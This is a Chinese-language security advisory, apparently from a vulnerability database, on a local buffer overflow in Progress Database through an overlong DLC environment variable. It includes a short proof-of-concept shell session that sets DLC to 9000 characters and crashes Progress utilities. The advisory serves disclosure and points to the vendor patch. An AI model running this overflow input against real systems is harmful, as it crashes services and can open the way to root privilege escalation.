Progress数据库环境变量本地缓冲区溢出漏洞
发布日期:2003-04-03
更新日期:2003-04-15
受影响系统:Progress Database 9.1D
Progress Database 9.1C
Progress Database 9.1B
Progress Database 8.3V
Progress Database 8.3E
Progress Database 8.3D
- HP HP-UX 11.0
- IBM AIX 4.3.3
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows 2000 Server SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- RedHat Linux 7.1
- RedHat Linux 7.0
- RedHat Linux 6.2
- Sun Solaris 2.6
- SuSE Linux 7.2
描述:
BUGTRAQ ID:
7312
Progress是一款商业性质的数据库系统,可使用在Microsoft Windows和Unix操作系统下。
Progress在读取'DLC'环境变量时缺少正确缓冲区边界检查,本地攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以root用户权限在系统上执行任意指令。
DLC环境变量可指示Progress哪里可以找到安装目录,当Progress请求和使用DLC变量时缺少正确的边界检查,攻击者提供超长的DLC环境变量,可触发缓冲区溢出攻击,精心构建环境变量数据可能以root用户权限在系统上执行任意指令。
<*来源:KF (
dotslash@snosoft.com)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=105013076019433&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
KF (
dotslash@snosoft.com)提供了如下测试方法:
bash-2.03$ export DLC=`perl -e 'print "A" x 9000'`
bash-2.03$ export PROMSGS=/path/to/promsgs
bash-2.03$ /u/dlctk/_proutil
SYSTEM ERROR: strent request for more than 32K (893)
** Please save file named core for analysis by PSC. (439)
Quit (core dumped)
bash-2.03$ /u/dlc6/_mprosrv
11:48:07 SYSTEM ERROR: strent request for more than 32K (893)
11:48:07 ** Please save file named core for analysis by PSC. (439)
Quit
建议:
厂商补丁:
Progress
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
Progress Upgrade Progress Database 9.1D05
http://www.progress.com/patches/浏览次数:3485
严重程度:0(网友投票)